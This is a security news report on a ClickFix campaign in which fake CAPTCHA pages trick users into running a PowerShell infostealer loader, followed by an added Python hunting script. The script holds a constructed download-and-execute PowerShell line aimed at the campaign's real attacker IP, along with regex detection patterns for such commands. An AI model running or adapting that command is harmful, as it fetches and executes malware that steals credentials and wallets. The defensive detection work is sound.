ClickFix Infostealer Campaign Uses Fake CAPTCHA Lures to Compromise Victims

Source: Cybersecurity News (cybersecuritynews.com), reporting on analysis by Cyber Proof

A sophisticated new malware campaign has emerged, leveraging fake CAPTCHA lures to deceive users and deploy a stealthy information stealer.

Identified in early 2026, this activity shares significant behavioral patterns with the ClickFix campaign that previously targeted restaurant reservation systems in July 2025.

The operators have refined their social engineering so that the victim, not a dropper, performs the step that traditional security controls would otherwise catch, giving the attackers initial access to the victim's system.

The attack initiates when a user visits a compromised website displaying a deceptive CAPTCHA verification page.

The page presents a "verification" step that silently places a PowerShell one-liner on the victim's clipboard and then instructs them to paste and run it themselves, typically through the Windows Run dialog.

This "ClickFix" technique relies on the human in the loop: automated sandboxes and download scanners inspect files that arrive from the browser, not commands a user types into a system prompt, so the initial execution never passes through them.

Clipboard data (Source – Cyber Proof)

The pasted command fetches the next stage from attacker infrastructure, specifically the IP 91.92.240.219. Before proceeding, the script reads the clipboard through Windows API calls to confirm that the copy-and-paste step actually took place, a crude check that it is running on a real victim rather than in an analysis environment.

Once executed, the malicious script begins a multi-stage infection process designed to steal sensitive data.

The malware targets a wide range of applications, including over twenty-five web browsers, cryptocurrency wallets like MetaMask, and enterprise VPN configurations. 

Cyber Proof analysts noted that the campaign checks for virtual environments and active security tools before exfiltration.

The impact is severe, granting attackers access to critical credentials and financial assets, allowing them to monetize compromised accounts or pivot deeper into corporate networks.

Process Injection and Persistence

The malware uses process injection to stay hidden on infected devices. After the initial PowerShell execution, it downloads a position-independent shellcode file named cptch.bin from the attacker's infrastructure.

The shellcode was generated with the Donut framework, which wraps a payload as position-independent shellcode so that it can be executed directly in memory. Analysts also observed an operational security error: the PowerShell loader used the variable name $finalPayload, which Microsoft Defender flags.

Loading of cptch.bin (Source – Cyber Proof)

Here the loader allocates memory for the shellcode using standard Windows memory APIs such as VirtualAlloc and runs it inside a benign-looking process such as svchost.exe, so that the malicious activity appears to originate from a trusted system process.

For persistence the attackers write to the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), the key in which Windows records commands entered in the Run dialog, which is also where the victim's initial Win+R paste leaves its trace. Cyber Proof reports that the modified entry is used to re-execute the malicious PowerShell command at startup, re-initiating the payload download. Note that RunMRU on its own is history, not an autostart location, so defenders should treat a PowerShell one-liner in this key as evidence of the ClickFix paste and hunt for the accompanying autostart mechanism rather than assuming deleting the entry removes persistence.

Persistence through RUNMRU key (Source – Cyber Proof)

This persistence mechanism is intended to give the actors long-term access. They also rotate payload filenames, cptchbuild.bin was observed alongside cptch.bin, so that indicators keyed on a single filename or on the hash of one particular build go stale quickly.

Organizations should educate users never to paste commands from a web page into the Run dialog, a terminal, or PowerShell, regardless of what "verification" the page claims to require. Security teams should monitor for PowerShell started by explorer.exe (the parent of Run-dialog commands) or by a browser, for PowerShell command lines that fetch and evaluate content from a raw IP address, and for writes to the RunMRU key.

Endpoint detection rules that flag PowerShell reading the clipboard, especially shortly after a browser interaction and combined with a download-and-execute command line, can identify this attack at its first stage, before the shellcode is loaded.
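The following is an added detection example, not Cyber Proof's or the article's code. It applies the checks recommended above to the two data sources the article names: the RunMRU key (Run-dialog history) and process-creation telemetry. The registry values and events are constructed for illustration; only the IP 91.92.240.219 comes from the article, and the URL path, the RunMRU value letters, and the event fields are assumptions modelled on Sysmon-style fields.

```python
"""Hunt for ClickFix-style activity in RunMRU values and process events.
Added example, not the article's or Cyber Proof's code. Samples below are
constructed; only 91.92.240.219 is taken from the article."""
from __future__ import annotations
import re

# Indicators for the one-liner shape the article describes: a script host
# started hidden, fetching a stage from a raw IP, evaluating it in memory,
# possibly reading the clipboard first.
INDICATORS = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript)(\.exe)?\b", re.I),
    "hidden_or_bypass": re.compile(
        r"-w(indowstyle)?\s+h(idden)?\b|-nop\b|-e(xecutionpolicy|xec|p)?\s+bypass\b", re.I),
    "download": re.compile(
        r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b"
        r"|invoke-restmethod|\birm\b|\bcurl\b", re.I),
    "in_memory_eval": re.compile(r"\biex\b|invoke-expression|\[reflection\.assembly\]::load", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}\b", re.I),
    "clipboard": re.compile(r"get-clipboard|\bclipboard\b", re.I),
    "encoded": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/]{20,}={0,2}", re.I),
}


def score_command(cmd: str) -> list[str]:
    """Names of the indicators present in a command line, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def is_clickfix_like(cmd: str) -> bool:
    """A script host plus at least two delivery/evasion indicators, or an
    encoded command. A plain '-ExecutionPolicy Bypass -File x.ps1' admin
    script scores only two hits and is not flagged."""
    hits = score_command(cmd)
    if "script_host" not in hits:
        return False
    return "encoded" in hits or len(hits) >= 3


def parse_runmru(values: dict[str, str]) -> list[tuple[str, str]]:
    """Order RunMRU entries most-recent-first. Windows stores each Run-dialog
    command under a single-letter value name with a trailing '\\1' marker and
    records recency in MRUList (first letter = most recent)."""
    entries = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is not None:
            entries.append((letter, raw.removesuffix("\\1")))
    return entries


def flag_process_event(ev: dict) -> str | None:
    """Reason string if a process-creation event looks like ClickFix execution."""
    parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    image = ev.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmd = ev.get("CommandLine", "")
    if image not in ("powershell.exe", "pwsh.exe", "mshta.exe"):
        return None
    # Win+R execution: explorer.exe is the parent of a Run-dialog command.
    if parent == "explorer.exe" and is_clickfix_like(cmd):
        return f"explorer.exe spawned {image} with {', '.join(score_command(cmd))}"
    # A browser should never be the parent of a script host.
    if parent in ("chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"):
        return f"browser {parent} spawned {image}"
    return None


def hunt(runmru: dict[str, str], events: list[dict]) -> list[tuple[str, str]]:
    """Combine both checks into one list of (source, detail) findings."""
    findings = []
    for letter, cmd in parse_runmru(runmru):
        if is_clickfix_like(cmd):
            findings.append(("RunMRU", f"value {letter}: {cmd}"))
    for ev in events:
        reason = flag_process_event(ev)
        if reason:
            findings.append(("ProcessCreate", reason))
    return findings


# Constructed RunMRU export (hypothetical; letters and path are made up).
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\tools\\1",
    "c": 'powershell -w hidden -nop -ep bypass -c "$c=Get-Clipboard; '
         'iex (iwr http://91.92.240.219/captcha)"\\1',
}

# Constructed process-creation events in Sysmon-style field names.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": SAMPLE_RUNMRU["c"].removesuffix("\\1")},
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell -c Get-Date"},
    {"ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": PS,
     "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "Image": PS,
     "CommandLine": "powershell -c whoami"},
]

if __name__ == "__main__":
    for source, detail in hunt(SAMPLE_RUNMRU, SAMPLE_EVENTS):
        print(f"[{source}] {detail}")
```

On a live host the RunMRU dictionary would come from reading the key with the winreg module and the events from Sysmon Event ID 1 or an EDR export; the scoring is deliberately combinational so that a single indicator such as `-ExecutionPolicy Bypass` in a scheduled admin script does not fire on its own.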
